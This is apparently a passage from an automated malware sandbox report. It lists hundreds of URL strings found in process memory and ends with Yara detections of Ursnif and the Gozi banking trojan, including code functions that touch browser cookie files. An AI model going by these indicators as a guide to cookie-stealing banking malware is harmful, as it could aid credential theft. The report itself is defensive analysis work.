            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6996, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

            E-Banking Fraud:

            barindex
            Detected Gozi e-Banking trojanShow sources
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_028231EC
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie0_2_028231EC
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_028231EC
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
